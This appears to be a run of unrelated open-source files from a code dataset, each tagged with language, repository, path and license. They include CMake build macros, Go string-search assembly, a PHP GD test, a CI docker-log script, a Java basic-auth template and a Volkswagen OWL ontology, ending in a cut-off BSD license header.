add_dependencies(${_target} ${${PROJECT_NAME}_CATKIN_BUILD_DEPENDS_EXPORTED_TARGETS})
endif()
endif()
if(NOT cs_add_library_NO_AUTO_EXPORT)
list(APPEND ${PROJECT_NAME}_LIBRARIES ${_target})
endif()
cs_add_targets_to_package(${_target})
endmacro()
macro(cs_install)
# Install targets (exec's and lib's)
foreach(_target ${${PROJECT_NAME}_TARGETS})
get_target_property(${_target}_type ${_target} TYPE)
message(STATUS "Marking ${${_target}_type} \"${_target}\" of package \"${PROJECT_NAME}\" for installation")
endforeach()
install(TARGETS ${${PROJECT_NAME}_TARGETS} ${ARGN}
ARCHIVE DESTINATION ${CATKIN_PACKAGE_LIB_DESTINATION}
LIBRARY DESTINATION ${CATKIN_PACKAGE_LIB_DESTINATION}
RUNTIME DESTINATION ${CATKIN_PACKAGE_BIN_DESTINATION}
)
if(EXISTS ${${PROJECT_NAME}_LOCAL_INCLUDE_DIR})
# Install include directory
message(STATUS "Marking HEADER FILES in \"include\" folder of package \"${PROJECT_NAME}\" for installation")
install(DIRECTORY ${${PROJECT_NAME}_LOCAL_INCLUDE_DIR}/
DESTINATION ${CATKIN_GLOBAL_INCLUDE_DESTINATION}
FILES_MATCHING PATTERN "*.h" PATTERN "*.hpp"
PATTERN ".svn" EXCLUDE
)
endif()
# Install shared content located in commonly used folders
set(_shared_content_folders launch rviz urdf meshes maps worlds Media param)
foreach(_folder ${_shared_content_folders})
if(IS_DIRECTORY ${CMAKE_CURRENT_SOURCE_DIR}/${_folder})
message(STATUS "Marking SHARED CONTENT FOLDER \"${_folder}\" of package \"${PROJECT_NAME}\" for installation")
install(DIRECTORY ${CMAKE_CURRENT_SOURCE_DIR}/${_folder}/
DESTINATION ${CATKIN_PACKAGE_SHARE_DESTINATION}/${_folder}
)
endif()
endforeach()
endmacro()
macro(cs_install_scripts)
install(PROGRAMS ${ARGN} DESTINATION ${CATKIN_PACKAGE_BIN_DESTINATION})
endmacro()
macro(cs_export)
cmake_parse_arguments(CS_PROJECT
"" "" "INCLUDE_DIRS;LIBRARIES;CATKIN_DEPENDS;DEPENDS;CFG_EXTRAS"
${ARGN})
set(${PROJECT_NAME}_CATKIN_RUN_DEPENDS)
foreach(dep ${${PROJECT_NAME}_RUN_DEPENDS})
find_package(${dep} QUIET)
if(${dep}_FOUND_CATKIN_PROJECT)
list(APPEND ${PROJECT_NAME}_CATKIN_RUN_DEPENDS ${dep})
endif()
endforeach()
catkin_package(
INCLUDE_DIRS ${${PROJECT_NAME}_LOCAL_INCLUDE_DIR} ${CS_PROJECT_INCLUDE_DIRS}
LIBRARIES ${${PROJECT_NAME}_LIBRARIES} ${CS_PROJECT_LIBRARIES}
CATKIN_DEPENDS ${${PROJECT_NAME}_CATKIN_RUN_DEPENDS} ${CS_PROJECT_CATKIN_DEPENDS}
DEPENDS ${CS_PROJECT_DEPENDS}
CFG_EXTRAS ${CS_PROJECT_CFG_EXTRAS}
)
endmacro()
| EmberScript | 4 | sahibdhanjal/astrobee | dependencies/catkin_simple/cmake/catkin_simple-extras.cmake.em | [
"Apache-2.0"
] |
// Copyright 2018 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
#include "go_asm.h"
#include "textflag.h"
TEXT ·Index(SB),NOSPLIT,$0-56
MOVQ a_base+0(FP), DI
MOVQ a_len+8(FP), DX
MOVQ b_base+24(FP), R8
MOVQ b_len+32(FP), AX
MOVQ DI, R10
LEAQ ret+48(FP), R11
JMP indexbody<>(SB)
TEXT ·IndexString(SB),NOSPLIT,$0-40
MOVQ a_base+0(FP), DI
MOVQ a_len+8(FP), DX
MOVQ b_base+16(FP), R8
MOVQ b_len+24(FP), AX
MOVQ DI, R10
LEAQ ret+32(FP), R11
JMP indexbody<>(SB)
// AX: length of string, that we are searching for
// DX: length of string, in which we are searching
// DI: pointer to string, in which we are searching
// R8: pointer to string, that we are searching for
// R11: address, where to put return value
// Note: We want len in DX and AX, because PCMPESTRI implicitly consumes them
TEXT indexbody<>(SB),NOSPLIT,$0
CMPQ AX, DX
JA fail
CMPQ DX, $16
JAE sse42
no_sse42:
CMPQ AX, $2
JA _3_or_more
MOVW (R8), R8
LEAQ -1(DI)(DX*1), DX
loop2:
MOVW (DI), SI
CMPW SI,R8
JZ success
ADDQ $1,DI
CMPQ DI,DX
JB loop2
JMP fail
_3_or_more:
CMPQ AX, $3
JA _4_or_more
MOVW 1(R8), BX
MOVW (R8), R8
LEAQ -2(DI)(DX*1), DX
loop3:
MOVW (DI), SI
CMPW SI,R8
JZ partial_success3
ADDQ $1,DI
CMPQ DI,DX
JB loop3
JMP fail
partial_success3:
MOVW 1(DI), SI
CMPW SI,BX
JZ success
ADDQ $1,DI
CMPQ DI,DX
JB loop3
JMP fail
_4_or_more:
CMPQ AX, $4
JA _5_or_more
MOVL (R8), R8
LEAQ -3(DI)(DX*1), DX
loop4:
MOVL (DI), SI
CMPL SI,R8
JZ success
ADDQ $1,DI
CMPQ DI,DX
JB loop4
JMP fail
_5_or_more:
CMPQ AX, $7
JA _8_or_more
LEAQ 1(DI)(DX*1), DX
SUBQ AX, DX
MOVL -4(R8)(AX*1), BX
MOVL (R8), R8
loop5to7:
MOVL (DI), SI
CMPL SI,R8
JZ partial_success5to7
ADDQ $1,DI
CMPQ DI,DX
JB loop5to7
JMP fail
partial_success5to7:
MOVL -4(AX)(DI*1), SI
CMPL SI,BX
JZ success
ADDQ $1,DI
CMPQ DI,DX
JB loop5to7
JMP fail
_8_or_more:
CMPQ AX, $8
JA _9_or_more
MOVQ (R8), R8
LEAQ -7(DI)(DX*1), DX
loop8:
MOVQ (DI), SI
CMPQ SI,R8
JZ success
ADDQ $1,DI
CMPQ DI,DX
JB loop8
JMP fail
_9_or_more:
CMPQ AX, $15
JA _16_or_more
LEAQ 1(DI)(DX*1), DX
SUBQ AX, DX
MOVQ -8(R8)(AX*1), BX
MOVQ (R8), R8
loop9to15:
MOVQ (DI), SI
CMPQ SI,R8
JZ partial_success9to15
ADDQ $1,DI
CMPQ DI,DX
JB loop9to15
JMP fail
partial_success9to15:
MOVQ -8(AX)(DI*1), SI
CMPQ SI,BX
JZ success
ADDQ $1,DI
CMPQ DI,DX
JB loop9to15
JMP fail
_16_or_more:
CMPQ AX, $16
JA _17_or_more
MOVOU (R8), X1
LEAQ -15(DI)(DX*1), DX
loop16:
MOVOU (DI), X2
PCMPEQB X1, X2
PMOVMSKB X2, SI
CMPQ SI, $0xffff
JE success
ADDQ $1,DI
CMPQ DI,DX
JB loop16
JMP fail
_17_or_more:
CMPQ AX, $31
JA _32_or_more
LEAQ 1(DI)(DX*1), DX
SUBQ AX, DX
MOVOU -16(R8)(AX*1), X0
MOVOU (R8), X1
loop17to31:
MOVOU (DI), X2
PCMPEQB X1,X2
PMOVMSKB X2, SI
CMPQ SI, $0xffff
JE partial_success17to31
ADDQ $1,DI
CMPQ DI,DX
JB loop17to31
JMP fail
partial_success17to31:
MOVOU -16(AX)(DI*1), X3
PCMPEQB X0, X3
PMOVMSKB X3, SI
CMPQ SI, $0xffff
JE success
ADDQ $1,DI
CMPQ DI,DX
JB loop17to31
JMP fail
// We can get here only when AVX2 is enabled and cutoff for indexShortStr is set to 63
// So no need to check cpuid
_32_or_more:
CMPQ AX, $32
JA _33_to_63
VMOVDQU (R8), Y1
LEAQ -31(DI)(DX*1), DX
loop32:
VMOVDQU (DI), Y2
VPCMPEQB Y1, Y2, Y3
VPMOVMSKB Y3, SI
CMPL SI, $0xffffffff
JE success_avx2
ADDQ $1,DI
CMPQ DI,DX
JB loop32
JMP fail_avx2
_33_to_63:
LEAQ 1(DI)(DX*1), DX
SUBQ AX, DX
VMOVDQU -32(R8)(AX*1), Y0
VMOVDQU (R8), Y1
loop33to63:
VMOVDQU (DI), Y2
VPCMPEQB Y1, Y2, Y3
VPMOVMSKB Y3, SI
CMPL SI, $0xffffffff
JE partial_success33to63
ADDQ $1,DI
CMPQ DI,DX
JB loop33to63
JMP fail_avx2
partial_success33to63:
VMOVDQU -32(AX)(DI*1), Y3
VPCMPEQB Y0, Y3, Y4
VPMOVMSKB Y4, SI
CMPL SI, $0xffffffff
JE success_avx2
ADDQ $1,DI
CMPQ DI,DX
JB loop33to63
fail_avx2:
VZEROUPPER
fail:
MOVQ $-1, (R11)
RET
success_avx2:
VZEROUPPER
JMP success
sse42:
CMPB internal∕cpu·X86+const_offsetX86HasSSE42(SB), $1
JNE no_sse42
CMPQ AX, $12
// PCMPESTRI is slower than normal compare,
// so using it makes sense only if we advance 4+ bytes per compare
// This value was determined experimentally and is the ~same
// on Nehalem (first with SSE42) and Haswell.
JAE _9_or_more
LEAQ 16(R8), SI
TESTW $0xff0, SI
JEQ no_sse42
MOVOU (R8), X1
LEAQ -15(DI)(DX*1), SI
MOVQ $16, R9
SUBQ AX, R9 // We advance by 16-len(sep) each iteration, so precalculate it into R9
loop_sse42:
// 0x0c means: unsigned byte compare (bits 0,1 are 00)
// for equality (bits 2,3 are 11)
// result is not masked or inverted (bits 4,5 are 00)
// and corresponds to first matching byte (bit 6 is 0)
PCMPESTRI $0x0c, (DI), X1
// CX == 16 means no match,
// CX > R9 means partial match at the end of the string,
// otherwise sep is at offset CX from X1 start
CMPQ CX, R9
JBE sse42_success
ADDQ R9, DI
CMPQ DI, SI
JB loop_sse42
PCMPESTRI $0x0c, -1(SI), X1
CMPQ CX, R9
JA fail
LEAQ -1(SI), DI
sse42_success:
ADDQ CX, DI
success:
SUBQ R10, DI
MOVQ DI, (R11)
RET
| GAS | 4 | SSSDNSY/go | src/internal/bytealg/index_amd64.s | [
"BSD-3-Clause"
] |
lib LibC
TCP_NODELAY = 0x01
TCP_KEEPINTVL = 0x101
TCP_KEEPCNT = 0x102
TCP_KEEPALIVE = 0x10
end
| Crystal | 3 | n00p3/crystal | src/lib_c/x86_64-darwin/c/netinet/tcp.cr | [
"Apache-2.0"
] |
"""Utils for Nexia / Trane XL Thermostats."""
from http import HTTPStatus
def is_invalid_auth_code(http_status_code):
"""HTTP status codes that mean invalid auth."""
if http_status_code in (HTTPStatus.UNAUTHORIZED, HTTPStatus.FORBIDDEN):
return True
return False
def percent_conv(val):
"""Convert an actual percentage (0.0-1.0) to 0-100 scale."""
if val is None:
return None
return round(val * 100.0, 1)
| Python | 4 | MrDelik/core | homeassistant/components/nexia/util.py | [
"Apache-2.0"
] |
--TEST--
Autovivification of false to array with data clobbering by error handler
--FILE--
<?php
set_error_handler(function($code, $msg) {
echo "Err: $msg\n";
$GLOBALS['a']=9;
});
$a=[];
($a[PHP_INT_MAX+1]);
?>
DONE
--EXPECTF--
Err: Implicit conversion from float %f to int loses precision
Err: Undefined array key %i
DONE
| PHP | 3 | NathanFreeman/php-src | Zend/tests/falsetoarray_003.phpt | [
"PHP-3.01"
] |
import asset from "./asset.jpg";
it("should define public path", () => {
expect(asset).toBe("/other/inner1/inner2/../../asset.jpg");
});
| JavaScript | 3 | fourstash/webpack | test/configCases/output/publicPath-web/c.js | [
"MIT"
] |
{{>licenseInfo}}
package {{invokerPackage}}.auth;
import {{invokerPackage}}.Pair;
{{^java8}}
import com.migcomponents.migbase64.Base64;
{{/java8}}
{{#java8}}
import java.util.Base64;
import java.nio.charset.StandardCharsets;
{{/java8}}
import java.util.Map;
import java.util.List;
{{^java8}}
import java.io.UnsupportedEncodingException;
{{/java8}}
{{>generatedAnnotation}}
public class HttpBasicAuth implements Authentication {
private String username;
private String password;
public String getUsername() {
return username;
}
public void setUsername(String username) {
this.username = username;
}
public String getPassword() {
return password;
}
public void setPassword(String password) {
this.password = password;
}
@Override
public void applyToParams(List<Pair> queryParams, Map<String, String> headerParams) {
if (username == null && password == null) {
return;
}
String str = (username == null ? "" : username) + ":" + (password == null ? "" : password);
{{^java8}}
try {
headerParams.put("Authorization", "Basic " + Base64.encodeToString(str.getBytes("UTF-8"), false));
} catch (UnsupportedEncodingException e) {
throw new RuntimeException(e);
}
{{/java8}}
{{#java8}}
headerParams.put("Authorization", "Basic " + Base64.getEncoder().encodeToString(str.getBytes(StandardCharsets.UTF_8)));
{{/java8}}
}
}
| HTML+Django | 4 | bradatmailchimp/mailchimp-client-lib-codegen | resources/swagger-original-templates/java/auth/HttpBasicAuth.mustache | [
"Apache-2.0"
] |
* List of Nyxt extensions
- [[https://github.com/kssytsrk/nx-freestance-handler][nx-freestance-handler]] ::
nx-freestance-handler is a redirector from mainstream websites to their
privacy-supporting mirrors for the Nyxt browser. It is currently able to
redirect from Youtube to Invidious, from Reddit to Teddit, from Instagram to
Bibliogram, and from Twitter to Nitter.
- [[https://github.com/aartaka/nx-search-engines][nx-search-engines]] ::
The aim of nx-search-engines is to get rid of black box world of search
bookmarklets and search cookies by moving to the pretty land of lispy syntax
and small helper functions generating search URIs.
- [[https://github.com/atlas-engineer/nx-ace][nx-ace]] ::
nx-ace allows you to use the Ace editor within Nyxt. To use it, load it, and
add =ace-mode= to your default modes for your =editor-buffer=.
- [[https://github.com/aartaka/nx-kaomoji.git][nx-kaomoji]] ::
nx-kaomoji lets you paste Kaomojis to any input field with a dedicated
command. Load it and run =kaomoji-fill= (or bind it to a key) in Nyxt.
- [[https://github.com/atlas-engineer/nx-fruit][nx-fruit]] ::
nx-fruit lets you discover the fruit of the day! A simple extension that you
can use to test your Nyxt installation (i.e. can you load extensions).
- [[https://github.com/efimerspan/nx-router][nx-router]] ::
nx-router is a URL routing extension for Nyxt. You can set up URL redirects,
block lists, open resources with external applications, all in a cohesive
configuration language.
- [[https://github.com/efimerspan/nx-tailor][nx-tailor]] ::
nx-tailor is a tailor for all-things Nyxt themes which helps you manage them,
change them on-the-fly, and discover new ones in a unified interface.
| Org | 3 | atlas-engineer/next | documents/EXTENSIONS.org | [
"BSD-3-Clause"
] |
#!/bin/bash
# Copyright 2019 Istio Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
set -eu
if [ -z ${CI+x} ]; then
# When not in CI, do nothing
exit 0;
fi
echo "Fetching docker container status"
docker ps || true
echo "Fetching buildx logs"
docker logs buildx_buildkit_container-builder0 || true
echo "Fetching docker logs"
cat /var/log/docker.log || true
echo "Fetching local registry logs"
docker logs kind-registry || true
| Shell | 3 | rveerama1/istio | tools/dump-docker-logs.sh | [
"Apache-2.0"
] |
// MIR for `foo` before PreCodegen
fn foo(_1: Option<()>) -> () {
debug bar => _1; // in scope 0 at $DIR/matches_reduce_branches.rs:7:8: 7:11
let mut _0: (); // return place in scope 0 at $DIR/matches_reduce_branches.rs:7:25: 7:25
bb0: {
return; // scope 0 at $DIR/matches_reduce_branches.rs:11:2: 11:2
}
}
| Mirah | 3 | mbc-git/rust | src/test/mir-opt/matches_reduce_branches.foo.PreCodegen.before.64bit.mir | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
@import './shared.css';
.green { color: green } | CSS | 4 | coreyscherbing/angular | packages/compiler-cli/integrationtest/src/basic.css | [
"MIT"
] |
<article class="{{ Model.Classes | join: " " }}">
<blockquote>
{{ Model.ContentItem.Content.Blockquote.Quote.Text }}
</blockquote>
</article> | Liquid | 3 | SvanBoxel/OrchardCore | src/OrchardCore.Themes/TheBlogTheme/Views/Widget-Blockquote.liquid | [
"BSD-3-Clause"
] |
var getData = require("library");
it("should be able get items from library (" + NAME + ")", function() {
const d = getData();
expect(d).toHaveProperty("x");
expect(d.x).toHaveProperty("y");
const data = d.x.y;
expect(data).toHaveProperty("default", "default-value");
expect(data).toHaveProperty("a", "a");
expect(data).toHaveProperty("b", "b");
});
| JavaScript | 3 | 1shenxi/webpack | test/configCases/library/1-use-library/var-test.js | [
"MIT"
] |
--TEST--
Test for correct colors of imagecopyresampled() wrt. alpha
--EXTENSIONS--
gd
--FILE--
<?php
const EXP_RED = 66;
const EXP_GREEN = 66;
const EXP_BLUE = 133;
const EXP_ALPHA = 32;
/* create the source image */
$im = imagecreatetruecolor(10, 10);
imagealphablending($im, false);
$solid = imagecolorallocate($im, 0, 100, 150);
$transparent = imagecolorallocatealpha($im, 200, 0, 100, 64);
/* draw a checker pattern */
for ($i = 0; $i < imagesx($im); $i++) {
for ($j = 0; $j < imagesy($im); $j++) {
imagesetpixel($im, $i, $j, ($i%2 != $j%2 ? $solid : $transparent));
}
}
/* create the destination image */
$copy = imagecreatetruecolor(5, 5);
imagealphablending($copy, false);
imagesavealpha($copy, true);
imagecopyresampled($copy, $im, 0,0, 0,0, 5,5, 10, 10);
/* assert all pixels have the same color */
$color = imagecolorat($copy, 3, 3);
for ($i = 0; $i < imagesx($copy); $i++) {
for ($j = 0; $j < imagesy($copy); $j++) {
if (imagecolorat($copy, $i, $j) != $color) {
echo 'different pixel values', PHP_EOL;
}
}
}
/* assign actual component values */
$red = ($color & 0xFF0000) >> 16;
$green = ($color & 0x00FF00) >> 8;
$blue = ($color & 0x0000FF);
$alpha = ($color & 0x7F000000) >> 24;
/* test for expected component values */
if (!($red >= EXP_RED - 1 && $red <= EXP_RED + 1)) {
printf("red: expected roughly %d, got %d\n", EXP_RED, $red);
}
if (!($green >= EXP_GREEN - 1 && $green <= EXP_GREEN + 1)) {
printf("green: expected roughly %d, got %d\n", EXP_GREEN, $green);
}
if (!($blue >= EXP_BLUE - 1 && $blue <= EXP_BLUE + 1)) {
printf("blue: expected roughly %d, got %d\n", EXP_BLUE, $blue);
}
if (!($alpha >= EXP_ALPHA - 1 && $alpha <= EXP_ALPHA + 1)) {
printf("alpha: expected roughly %d, got %d\n", EXP_ALPHA, $alpha);
}
imagedestroy($copy);
imagedestroy($im);
echo 'DONE';
?>
--EXPECT--
DONE
| PHP | 4 | NathanFreeman/php-src | ext/gd/tests/imagecopyresampled_variation1.phpt | [
"PHP-3.01"
] |
// dlfcn.hb
// from bits/dlfcn.h
const int RTLD_LAZY = 0x0001;
const int RTLD_NOW = 0x0002;
const int RTLD_NOLOAD = 0x0004;
const int RTLD_DEEPBIND = 0x0008;
const int RTLD_LOCAL = 0x0000;
const int RTLD_GLOBAL = 0x0100;
const int RTLD_NODELETE = 0x1000;
// from dlfcn.h
extern void* dlopen(char* filename, int flag);
extern char* dlerror(void);
extern void* dlsym(void* handle, char* symbol);
extern int dlclose(void* handle);
| Harbour | 3 | ueki5/cbc | import/dlfcn.hb | [
"Unlicense"
] |
@prefix : <http://localhost/ontologies/2019/1/10/automobile#> .
@prefix owl: <http://www.w3.org/2002/07/owl#> .
@prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .
@prefix xml: <http://www.w3.org/XML/1998/namespace> .
@prefix xsd: <http://www.w3.org/2001/XMLSchema#> .
@prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .
@base <http://localhost/ontologies/2019/1/10/automobile> .
<http://localhost/ontologies/2019/1/10/automobile> rdf:type owl:Ontology .
#################################################################
# Object Properties
#################################################################
### http://localhost/ontologies/2019/1/10/automobile#hasEngine
:hasEngine rdf:type owl:ObjectProperty ;
rdfs:domain :Automobile ;
rdfs:range :Engine .
#################################################################
# Classes
#################################################################
### http://localhost/ontologies/2019/1/10/automobile#Atlas
:Atlas rdf:type owl:Class ;
rdfs:subClassOf :SUV ;
rdfs:label "Atlas" .
### http://localhost/ontologies/2019/1/10/automobile#Automobile
:Automobile rdf:type owl:Class ;
rdfs:label "Automobile" .
### http://localhost/ontologies/2019/1/10/automobile#Beetle
:Beetle rdf:type owl:Class ;
rdfs:subClassOf :Compact ;
rdfs:label "Beetle" .
### http://localhost/ontologies/2019/1/10/automobile#Beetle_Convertible
:Beetle_Convertible rdf:type owl:Class ;
rdfs:subClassOf :Convertible ;
rdfs:label "Beetle Convertible" .
### http://localhost/ontologies/2019/1/10/automobile#Compact
:Compact rdf:type owl:Class ;
rdfs:subClassOf :Volkswagen ;
rdfs:label "Compact" .
### http://localhost/ontologies/2019/1/10/automobile#Components
:Components rdf:type owl:Class ;
rdfs:label "Component" .
### http://localhost/ontologies/2019/1/10/automobile#Convertible
:Convertible rdf:type owl:Class ;
rdfs:subClassOf :Volkswagen .
### http://localhost/ontologies/2019/1/10/automobile#Electric
:Electric rdf:type owl:Class ;
rdfs:subClassOf :Engine ;
rdfs:label "Electric" .
### http://localhost/ontologies/2019/1/10/automobile#Engine
:Engine rdf:type owl:Class ;
rdfs:subClassOf :Components ;
rdfs:label "Engine" .
### http://localhost/ontologies/2019/1/10/automobile#Golf
:Golf rdf:type owl:Class ;
owl:equivalentClass [ owl:intersectionOf ( :Compact
[ rdf:type owl:Restriction ;
owl:onProperty :hasEngine ;
owl:hasValue :OWLNamedIndividual_e5d803a9_b2c4_4b42_9569_5bc7985a9cd5
]
) ;
rdf:type owl:Class
] ;
rdfs:subClassOf :Compact ;
rdfs:label "Golf" .
### http://localhost/ontologies/2019/1/10/automobile#Golf_Alltrack
:Golf_Alltrack rdf:type owl:Class ;
rdfs:subClassOf :Wagon ;
rdfs:label "Golf Alltrack" .
### http://localhost/ontologies/2019/1/10/automobile#Golf_GTI
:Golf_GTI rdf:type owl:Class ;
owl:equivalentClass [ owl:intersectionOf ( :Compact
[ rdf:type owl:Restriction ;
owl:onProperty :hasEngine ;
owl:hasValue <http://localhost/ontologies/2019/1/10/automobile#2.0L_Turbo>
]
) ;
rdf:type owl:Class
] ;
rdfs:subClassOf :Compact ;
rdfs:label "Golf GTI" .
### http://localhost/ontologies/2019/1/10/automobile#Golf_R
:Golf_R rdf:type owl:Class ;
rdfs:subClassOf :Compact ;
rdfs:label "Golf R" .
### http://localhost/ontologies/2019/1/10/automobile#Golf_Sportwagen
:Golf_Sportwagen rdf:type owl:Class ;
rdfs:subClassOf :Wagon ;
rdfs:label "Golf Sportwagen" .
### http://localhost/ontologies/2019/1/10/automobile#Jetta
:Jetta rdf:type owl:Class ;
rdfs:subClassOf :Sedan ;
rdfs:label "Jetta" .
### http://localhost/ontologies/2019/1/10/automobile#OWLClass_4a7be008_c5fd_48ef_8c48_66c321827730
:OWLClass_4a7be008_c5fd_48ef_8c48_66c321827730 rdf:type owl:Class ;
rdfs:subClassOf :Engine ;
rdfs:label "Gas"@en .
### http://localhost/ontologies/2019/1/10/automobile#Passat
:Passat rdf:type owl:Class ;
rdfs:subClassOf :Sedan ;
rdfs:label "Passat" .
### http://localhost/ontologies/2019/1/10/automobile#SUV
:SUV rdf:type owl:Class ;
rdfs:subClassOf :Volkswagen .
### http://localhost/ontologies/2019/1/10/automobile#Sedan
:Sedan rdf:type owl:Class ;
rdfs:subClassOf :Volkswagen .
### http://localhost/ontologies/2019/1/10/automobile#Tiguan
:Tiguan rdf:type owl:Class ;
rdfs:subClassOf :SUV ;
rdfs:label "Tiguan" .
### http://localhost/ontologies/2019/1/10/automobile#Volkswagen
:Volkswagen rdf:type owl:Class ;
rdfs:subClassOf :Automobile ;
rdfs:label "Volkswagen" .
### http://localhost/ontologies/2019/1/10/automobile#Wagon
:Wagon rdf:type owl:Class ;
rdfs:subClassOf :Volkswagen .
### http://localhost/ontologies/2019/1/10/automobile#e-Golf
:e-Golf rdf:type owl:Class ;
owl:equivalentClass [ owl:intersectionOf ( :Compact
[ rdf:type owl:Restriction ;
owl:onProperty :hasEngine ;
owl:hasValue :OWLNamedIndividual_ffcdc378_4c39_4819_8f56_972132252c43
]
) ;
rdf:type owl:Class
] ;
rdfs:subClassOf :Compact ;
rdfs:label "e-Golf" .
#################################################################
# Individuals
#################################################################
### http://localhost/ontologies/2019/1/10/automobile#Golf_GTI_Autobahn
:Golf_GTI_Autobahn rdf:type owl:NamedIndividual ,
:Automobile ,
:Compact ,
:Golf_GTI ,
:Volkswagen ;
:hasEngine <http://localhost/ontologies/2019/1/10/automobile#2.0L_Turbo> ;
rdfs:label "Golf GTI Autobahn" .
### http://localhost/ontologies/2019/1/10/automobile#Golf_GTI_Rabbit_Edition
:Golf_GTI_Rabbit_Edition rdf:type owl:NamedIndividual ,
:Automobile ,
:Compact ,
:Golf_GTI ,
:Volkswagen ;
:hasEngine <http://localhost/ontologies/2019/1/10/automobile#2.0L_Turbo> ;
rdfs:label "Golf GTI Rabbit Edition" .
### http://localhost/ontologies/2019/1/10/automobile#Golf_GTI_S
:Golf_GTI_S rdf:type owl:NamedIndividual ,
:Automobile ,
:Compact ,
:Golf_GTI ,
:Volkswagen ;
:hasEngine <http://localhost/ontologies/2019/1/10/automobile#2.0L_Turbo> ;
rdfs:label "Golf GTI S" .
### http://localhost/ontologies/2019/1/10/automobile#Golf_GTI_SE
:Golf_GTI_SE rdf:type owl:NamedIndividual ,
:Automobile ,
:Compact ,
:Golf_GTI ,
:Volkswagen ;
:hasEngine <http://localhost/ontologies/2019/1/10/automobile#2.0L_Turbo> ;
rdfs:label "Golf GTI SE" .
### http://localhost/ontologies/2019/1/10/automobile#OWLNamedIndividual_0d96bd7e_7905_45b8_8fb0_0c0b994bf45d
:OWLNamedIndividual_0d96bd7e_7905_45b8_8fb0_0c0b994bf45d rdf:type owl:NamedIndividual ,
:Automobile ,
:Compact ,
:Volkswagen ,
:e-Golf ;
:hasEngine :OWLNamedIndividual_ffcdc378_4c39_4819_8f56_972132252c43 ;
rdfs:label "e-Golf SE"@en .
### http://localhost/ontologies/2019/1/10/automobile#OWLNamedIndividual_6707f4f2_1f84_474d_a289_c6b85d9001fa
:OWLNamedIndividual_6707f4f2_1f84_474d_a289_c6b85d9001fa rdf:type owl:NamedIndividual ,
:Automobile ,
:Compact ,
:Golf ,
:Volkswagen ;
:hasEngine :OWLNamedIndividual_e5d803a9_b2c4_4b42_9569_5bc7985a9cd5 ;
rdfs:label "Golf SE"@en .
### http://localhost/ontologies/2019/1/10/automobile#OWLNamedIndividual_b4e544ad_972f_42ae_ba3f_a424b7364e10
:OWLNamedIndividual_b4e544ad_972f_42ae_ba3f_a424b7364e10 rdf:type owl:NamedIndividual ,
:Automobile ,
:Compact ,
:Volkswagen ,
:e-Golf ;
:hasEngine :OWLNamedIndividual_ffcdc378_4c39_4819_8f56_972132252c43 ;
rdfs:label "e-Golf SEL Premium"@en .
### http://localhost/ontologies/2019/1/10/automobile#OWLNamedIndividual_ced457df_f62f_4c17_a76f_8c63387a90c5
:OWLNamedIndividual_ced457df_f62f_4c17_a76f_8c63387a90c5 rdf:type owl:NamedIndividual ,
:Automobile ,
:Compact ,
:Golf ,
:Volkswagen ;
:hasEngine :OWLNamedIndividual_e5d803a9_b2c4_4b42_9569_5bc7985a9cd5 ;
rdfs:label "Golf S"@en .
### http://localhost/ontologies/2019/1/10/automobile#OWLNamedIndividual_e5d803a9_b2c4_4b42_9569_5bc7985a9cd5
:OWLNamedIndividual_e5d803a9_b2c4_4b42_9569_5bc7985a9cd5 rdf:type owl:NamedIndividual ,
:Components ,
:Engine ,
:OWLClass_4a7be008_c5fd_48ef_8c48_66c321827730 ;
rdfs:label "1.4L Turbo"@en .
### http://localhost/ontologies/2019/1/10/automobile#OWLNamedIndividual_ffcdc378_4c39_4819_8f56_972132252c43
:OWLNamedIndividual_ffcdc378_4c39_4819_8f56_972132252c43 rdf:type owl:NamedIndividual ,
:Components ,
:Electric ,
:Engine ;
rdfs:label "100kW"@en .
### http://localhost/ontologies/2019/1/10/automobile#2.0L_Turbo
<http://localhost/ontologies/2019/1/10/automobile#2.0L_Turbo> rdf:type owl:NamedIndividual ,
:Components ,
:Engine ,
:OWLClass_4a7be008_c5fd_48ef_8c48_66c321827730 ;
rdfs:label "2.0L Turbo" .
### Generated by the OWL API (version 4.5.6.2018-09-06T00:27:41Z) https://github.com/owlcs/owlapi
| Web Ontology Language | 4 | jonmcalder/neosemantics | docs/rdf/vw.owl | [
"Apache-2.0"
] |
// Copyright 2015 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
//go:build mips64 || mips64le
// +build mips64 mips64le
#include "textflag.h"
#define SYNC WORD $0xf
TEXT ·publicationBarrier(SB),NOSPLIT|NOFRAME,$0-0
SYNC
RET
| GAS | 4 | rleungx/go | src/runtime/atomic_mips64x.s | [
"BSD-3-Clause"
] |
/*
* Copyright (C) 2009 Steve Rowe <[email protected]>
* Copyright (C) 2020 Google, LLC.
*
* License: https://opensource.org/licenses/BSD-3-Clause
*
* Redistribution and use in source and binary forms, with or without modification, are permitted
* provided that the following conditions are met:
*
* 1. Redistributions of source code must retain the above copyright notice, this list of conditions
* and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright notice, this list of
* conditions and the following disclaimer in the documentation and/or other materials provided with
* the distribution.
* 3. Neither the name of the copyright holder nor the names of its contributors may be used to
* endorse or promote products derived from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
* IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
* FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
* CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
